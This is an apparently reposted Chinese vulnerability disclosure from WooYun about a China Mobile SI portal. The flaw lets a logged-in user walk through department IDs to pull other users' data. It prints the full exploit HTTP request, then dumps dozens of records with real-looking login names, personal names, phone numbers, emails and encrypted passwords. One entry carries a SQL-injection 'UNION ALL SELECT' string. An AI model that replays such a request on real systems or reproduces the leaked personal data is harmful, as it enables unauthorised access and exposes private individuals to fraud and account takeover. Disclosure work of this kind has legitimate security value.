记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

中国移动si业务管理系统漏洞可影响大量用户信息(账号/姓名/手机/邮箱/密码等)

2016-07-18 16:05

注册个账号后,http://**.**.**.**/si/portal/register.jsp

3.png



然后有这么一个请求

code 区域
POST /server/auth/findDepartment.action HTTP/1.1

Host: **.**.**.**

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded

Referer: http://**.**.**.**/si/auth/individual/modifyInfo.jsp

Content-Length: 81

Cookie: JSESSIONID=1A377EC122C2A8227B6A7CF45563F33D

X-Forwarded-For: **.**.**.**

Connection: close



department.departmentId=1016481&ticket=1A377EC122C2A8227B6A7CF45563F33D&domain=si



然后可以遍历

1.png



泄露的信息,

2.png



code 区域
Payload"loginName":""mobile":""password":""realName":""email":"Comment

1016621进学科技18813396658CeISzPMC2oO4nU9WFUNQ\/Q==进学科技303963631@**.**.**.**

1016301讯宇创世13621097201iGlWz5LuREiprjVCAiHbiA==北京讯宇创世科技有限公司cmgame@**.**.**.**

1016681测试100615815352980ZDIaYXYBbhr8cpDG5tY+8Q==测试账号359976215@**.**.**.**

1016723泉龙达科技13516205707KJbjdP5gykFLm0JWvvWUzg==quanlongda13516205707@**.**.**.**

1016722泉龙达135162057077lc6DxnLTqqVJMY+wZVgOg==quanlongda13516205707@**.**.**.**

1016421企业闪信-景心15022201502qHg+qyGTkbDWbP2gxyVccw==裴玲艳peilingyan@**.**.**.**

1016781zhubing122513668676669P9nDLMzDErI69q4hVisVQw==122500178765322@**.**.**.**

1016161zhongxingwangka13602128111Y4V1f1qAiVE+OF7bgS8LNg==zhongxingwangkaoper1@**.**.**.**

1016361zhaoxfa188326841167X110ojWIOFodjucaMA\/lQ==赵小飞951288307@**.**.**.**

1015901zhangwei152188480096QwNLmgNjG69\/1M\/8klGbA==zhangwei294660560@**.**.**.**' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--

1015841z12345618896724354o9vP55LnoGaqBWQVy3qmnA==z123456123@**.**.**.**

1015922yanduwei13911943880S5dxthIwcYbfpEc9Its39A==yanduwei276860265@**.**.**.**

1016061wshh200815182011250ZOzKC39Bp4pXpQj3giWdpQ==haha395003125@**.**.**.**

1016102wenhao13548839276nQ4E\/Zs2tm4Ocr72v2GR3g==wenhao1769491495@**.**.**.**

1016263wangqihua15880229257QREKrGkgkylK61Mcy209WQ==中国移动通信福建有限公司360429197@**.**.**.**

1016541tjsckj13622132507GgLpX94IDfj7ZF\/DlE0uNQ==shengchuangyudejiang@**.**.**.**

1016121tester01713148375348ixs3lKoOJQT3Hxu6hRgZTg==tester017iopiop121@**.**.**.**

1016463test215294567856rX\/QAx5z67PYIq6XIPjqpg==test2test@**.**.**.**

1015881test12345613434231234XsS48YTyTRBeUcespeyHvg==masayatktktktk0001@**.**.**.**

1015941test1150345180614uieWn2tMmSiIX8omL14Pw==发送到admin@**.**.**.**

1016701szsqld13554915786Y7v2SyFEqFG1eufU1sXVYA==深圳市泉龙达科技发展有限公司13554915786@**.**.**.**

1016783sunzhix15263321415K\/Zo5bqjwKhmFEkFCG13Pg==孙志祥15263321415@**.**.**.**

1016721slyslan150603162128gB+t71sH8eWIKk4XYVNww==slyslan418222920@**.**.**.**

1016201sis197513904513134Q8kPHlN2XNdd86iPRUrcIg==网络运营1712347309@**.**.**.**

1016801sim_admin13718580212944t\/HSlXQWSado+0S65Ig==sunyu1608489185@**.**.**.**

1016401shenhongjian139672259617OC3UfnoeZdzrWeMamdqUA==shenhongjian954059412@**.**.**.**

1016822nstest213811111111i4ZCznTk8jYEE8U5UeFFHQ==nstest210001@**.**.**.**

1016821nstest13811111111vj3dBP1vke26OaY035OU2Q==nstest210001@**.**.**.**

1015782nbl198615000554866V1McDH8ucD8cSJnCkIHhnQ==158569600@**.**.**.**

1016841mykjava213825612079kF4uWtkMQWpgr24YrOLUHw==mykjava2thinkyou123@**.**.**.**

1016181lywswyk13583108972Cy\/kwQ8fPM6VdWW0EAR2Aw==lywswyklywswyk@**.**.**.**

1016601loveCS176313528212007bZYR3bAiKD8mnWjVWm6IJQ==loveCS1763[email protected]

1016521lirk.jsyt13956325007pjenJK3ie5ADYbMJPJQ4SQ==jeoco_lirklirk.jsyt@**.**.**.**

1016381kissxxzz13911139733Qt3leMO0Xbx+9HQv\/2RfWA==hlj2016hyh@**.**.**.**

1016661jiaoxiang18252121859rgCNC+6JsRER7V2Ih9+oZg==jiaoxiangjiaoxl1986@**.**.**.**

1015981jiangsenxing159617056389oDaCo20G5XHm70+RHsfiw==蒋森兴1149785673@**.**.**.**

1016281hujiashun188583601754z0q16ok0ljeAoG8dEuFww==hujiashun1096024041@**.**.**.**

1016441hubeillwy13995777715FG7VXATANx29\/Lizvv5jcw==湖北联利伟业lijian@**.**.**.**

1016561huangxiaohui13849612123GQ6723zegGniaHl\/5IXerg==huangxiaohuihuangxiaohui@**.**.**.**

1016782huanggua15911111111xr\/Bxseo87VIvw3A7eBKug==huanggua123@**.**.**.**

1016241heshiwo13521202355fZ3qfNYQZ5PsxaiG7Q\/oAA==heshiwo13521202355@**.**.**.**

1016641djl112215285911190CIkHWubsPdFDSXY1Xxmg+w==抢油593143291@**.**.**.**

1015801cla210118852486269Z+e3Zzc6Yh22OnaW7+Ze8g==书生clcumt@**.**.**.**

1016101cj858cj15010028119e37s9S4CmnPbM2JQ0Ku2qA==陈金秋719991984@**.**.**.**

1016461chongfeng13926600450NlUEqqQuKLk7mNXqJEeLkA==chongfeng1662331663@**.**.**.**

bma123188888888882wnJ5Ef9RH3a2alWhtKJJQ==李辉blackmanba.china@**.**.**.**

1016861bma123188888888882wnJ5Ef9RH3a2alWhtKJJQ==李辉blackmanba.china@**.**.**.**

1015961ak4715219118952Ywr4HoEQE3ZShShgAexIXg==ak471@**.**.**.**

1016462adminaa15189658965ijxvJr0NAd8VumT\/io4edA==adminaa58965@**.**.**.**

1016262admin2158454545453N5INq8n64wdMAes78F9Vg==123dasd@**.**.**.**

1016321admin113875467890OoJxQp8a\/Osl1k7Rwfw33A==1234532123@**.**.**.**

1015921aa1795115929807202p6VBBpZ7noQxT05+UazKow==aaqqww15929807202@**.**.**.**

101604297909190713936027352T5AizXVVPQnxflzuIdXJjg==李强979091907@**.**.**.**

10165812766118665182166789396Nr7KvQNnyOO7A6XN6gO3Q==诸城代理商2766118665@**.**.**.**

101600120493015049133333Fv7M4AmS8NsJOvZyuqv\/RA==2049302859515123@**.**.**.**

10160411q13843723521Isv+O\/af0mXsFxFFXmAuOA==q1138@**.**.**.**

1016761197937617115845317539XS\/EFF3H+Z+\/L8NwTiuIVQ==Sunday1979376171@**.**.**.**

10160811879988977813899159892QDjuS2h2mwhrNaRiKlVbuw==18799889778[email protected]

10160211870125678015229393711b7JzgOV3gNp7bYRu4qzbrA==武三刚18701256780@**.**.**.**

10158211828382369318283823693khHcAZllpIHxxA4FgBZoMw==shimin125832760@**.**.**.**

10162611588022825715845454545e+LNiQQBEIpF3EuFTgzIwg==admin2'dasd@**.**.**.**

10165011583472614015834726140ltDPXYKN59kguPW7jdN\/Kg==李佳霖[email protected]

10162211513877695615138776956sQIowoMKkEalUtSE\/dgAqQ==谷旭娜121836747@**.**.**.**

10167411351600339113516003391r7Y3VOhGxCwrBRDplDATVQ==z12904210911290421091@**.**.**.**

10161411347969074713479690747VbIVJswIvOwd891tYMuOKw==承诺10714886@**.**.**.**

10158611347600363013476003630SKQ5Kv1PRPbw3wdq\/s57vA==sgz13476003630@**.**.**.**

101634112313800013800ZKzJWdQgEP9LW8qI1MfPWA==123123@**.**.**.**

1016481100501119415825928568OFpxWgDuOXocWWm\/dZBiUA==Andy1005011194@**.**.**.**

漏洞证明:

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2016-0215025

阅读:496242 | 评论:0 | 标签:漏洞 移动

想收藏或者和大家分享这篇好文章→复制链接地址

“中国移动si业务管理系统漏洞可影响大量用户信息(账号/姓名/手机/邮箱/密码等)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

标签云 ☁